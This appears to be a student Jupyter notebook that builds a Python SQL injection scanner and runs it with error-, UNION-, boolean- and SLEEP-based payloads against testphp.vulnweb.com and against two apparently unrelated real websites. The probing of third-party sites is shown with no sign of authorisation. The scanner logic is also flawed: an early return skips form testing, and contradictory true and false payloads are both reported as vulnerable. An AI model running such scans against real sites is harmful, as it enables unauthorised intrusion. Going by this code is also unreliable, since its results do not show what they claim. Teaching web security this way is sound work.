# **SQL INJECTION**

## **Method 1:**
## Finding vulnerabilities by extracting forms from a website

Yashvardhan Gupta (20BCE1289)

Devika Santosh (20BAI1099)

### Importing Modules

In [ ]:
import requests
from bs4 import BeautifulSoup as bs
from urllib.parse import urljoin
from pprint import pprint

### Start Session

In [ ]:
s = requests.Session()
s.headers["User-Agent"] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36"

### Functions to test for vulnerabilities

In [ ]:
def get_all_forms(url):
    #Returns all the forms from a URL
    soup = bs(s.get(url).content, "html.parser")
    return soup.find_all("form")


def get_form_details(form):
    #Extracts information about the HTML form
    details = {}
    # get form action (target url)
    try:
        action = form.attrs.get("action").lower()
    except:
        action = None
    # get form method (GET, POST, etc.)
    method = form.attrs.get("method", "get").lower()
    # get all form input details
    inputs = []
    for input_tag in form.find_all("input"):
        input_type = input_tag.attrs.get("type", "text")
        input_name = input_tag.attrs.get("name")
        input_value = input_tag.attrs.get("value", "")
        inputs.append({"type": input_type, "name": input_name, "value": input_value})
    # add details to dictionary
    details["action"] = action
    details["method"] = method
    details["inputs"] = inputs
    return details


def is_vulnerable(response):
    #Boolean function that determines whether a page is vulnerable to SQL Injection based on its response
    errors = {
        # MySQL
        "you have an error in your sql syntax;",
        "warning: mysql",
        # SQL Server
        "unclosed quotation mark after the character string",
        # Oracle
        "quoted string not properly terminated",
    }
    for error in errors:
        if error in response.content.decode().lower(): #if any error found
            return True
    return False #if no error detected

def scan_sql_injection(url):
    # test on URL
    for c in "\"'":
        new_url = f"{url}{c}" #add quote/double quote character to the URL
        print("Testing", new_url)
        forms = get_all_forms(url)
        print(f"Detected {len(forms)} form(s) on {url}.")
        res = s.get(new_url) #make the HTTP request
        if is_vulnerable(res):
            # SQL Injection detected on the URL itself, 
            # no need to preceed for extracting forms and submitting them
            print("SQL Injection vulnerability detected on:", new_url)
            return
        else:
            print("No vulnerability detected on: ", new_url)
            return
            
    # test on HTML forms
    forms = get_all_forms(url)
    print(f"Detected {len(forms)} form(s) on {url}.")
    for form in forms:
        form_details = get_form_details(form)
        for c in "\"'":
            # the data body we want to submit
            data = {}
            for input_tag in form_details["inputs"]:
                if input_tag["value"] or input_tag["type"] == "hidden":
                    # any input form that has some value or hidden,
                    # just use it in the form body
                    try:
                        data[input_tag["name"]] = input_tag["value"] + c
                    except:
                        pass
                elif input_tag["type"] != "submit":
                    # all others except submit, use some junk data with special character
                    data[input_tag["name"]] = f"test{c}"
            # join the url with the action (form request URL)
            url = urljoin(url, form_details["action"])
            if form_details["method"] == "post":
                res = s.post(url, data=data)
            elif form_details["method"] == "get":
                res = s.get(url, params=data)
            # test whether the resulting page is vulnerable
            if is_vulnerable(res):
                print("SQL Injection vulnerability detected on:", url)
                print("Form:")
                pprint(form_details)
                break   

##Error-based SQL injection
inserts a malicious query to get an error that displays a message containing sensitive information about the database

In [ ]:
url="http://testphp.vulnweb.com/listproducts.php?cat=1%27"
scan_sql_injection(url)

Testing http://testphp.vulnweb.com/listproducts.php?cat=1%27"
Detected 1 form(s) on http://testphp.vulnweb.com/listproducts.php?cat=1%27.
SQL Injection vulnerability detected on: http://testphp.vulnweb.com/listproducts.php?cat=1%27"


##Union-based SQL injection
When an application is vulnerable to SQL injection and the results of the query are returned within the application's responses, the UNION keyword can be used to retrieve data from other tables within the database.

In [ ]:
url="http://testphp.vulnweb.com/artists.php?artist=-1%20UNION%20SELECT%201,version(),current_user()"
scan_sql_injection(url)

Testing http://testphp.vulnweb.com/artists.php?artist=-1%20UNION%20SELECT%201,version(),current_user()"
Detected 1 form(s) on http://testphp.vulnweb.com/artists.php?artist=-1%20UNION%20SELECT%201,version(),current_user().
SQL Injection vulnerability detected on: http://testphp.vulnweb.com/artists.php?artist=-1%20UNION%20SELECT%201,version(),current_user()"


##Boolean-based SQL injection
relies on sending an SQL query to the database which forces the application to return a different result depending on whether the query returns a TRUE or FALSE result.

In [ ]:
#1=1
url1="http://testphp.vulnweb.com/artists.php?artist=1%20AND%201=1" #http://testphp.vulnweb.com/artists.php?artist=1 AND 1=1
scan_sql_injection(url1)

Testing http://testphp.vulnweb.com/artists.php?artist=1%20AND%201=1"
Detected 1 form(s) on http://testphp.vulnweb.com/artists.php?artist=1%20AND%201=1.
SQL Injection vulnerability detected on: http://testphp.vulnweb.com/artists.php?artist=1%20AND%201=1"


In [ ]:
#1=0
url2="http://testphp.vulnweb.com/artists.php?artist=1%20AND%201=0" #http://testphp.vulnweb.com/artists.php?artist=1 AND 1=0
scan_sql_injection(url2)

Testing http://testphp.vulnweb.com/artists.php?artist=1%20AND%201=0"
Detected 1 form(s) on http://testphp.vulnweb.com/artists.php?artist=1%20AND%201=0.
SQL Injection vulnerability detected on: http://testphp.vulnweb.com/artists.php?artist=1%20AND%201=0"


##Time-based SQL injection
relies on sending an SQL query to the database which forces the database to wait for a specified amount of time (in seconds) before responding. The response time will indicate to the attacker whether the result of the query is TRUE or FALSE

In [ ]:
#this will wait 3 seconds before responding
url="http://testphp.vulnweb.com/artists.php?artist=1-SLEEP(3)"
scan_sql_injection(url)

Testing http://testphp.vulnweb.com/artists.php?artist=1-SLEEP(3)"
Detected 1 form(s) on http://testphp.vulnweb.com/artists.php?artist=1-SLEEP(3).
SQL Injection vulnerability detected on: http://testphp.vulnweb.com/artists.php?artist=1-SLEEP(3)"


##Form SQL Detection

In [ ]:
url = "http://vacationet.com/resort.php?id=22"
scan_sql_injection(url)

Testing http://vacationet.com/resort.php?id=22"
Detected 2 form(s) on http://vacationet.com/resort.php?id=22.
No vulnerability detected on:  http://vacationet.com/resort.php?id=22"


In [ ]:
url = "http://jokusoftware.cz/file.php?id=icqj3"
scan_sql_injection(url)

Testing http://jokusoftware.cz/file.php?id=icqj3"
Detected 0 form(s) on http://jokusoftware.cz/file.php?id=icqj3.
No vulnerability detected on:  http://jokusoftware.cz/file.php?id=icqj3"


##Safe Query

In [ ]:
url2="http://testphp.vulnweb.com/"
scan_sql_injection(url2)

Testing http://testphp.vulnweb.com/"
Detected 1 form(s) on http://testphp.vulnweb.com/.
No vulnerability detected on:  http://testphp.vulnweb.com/"
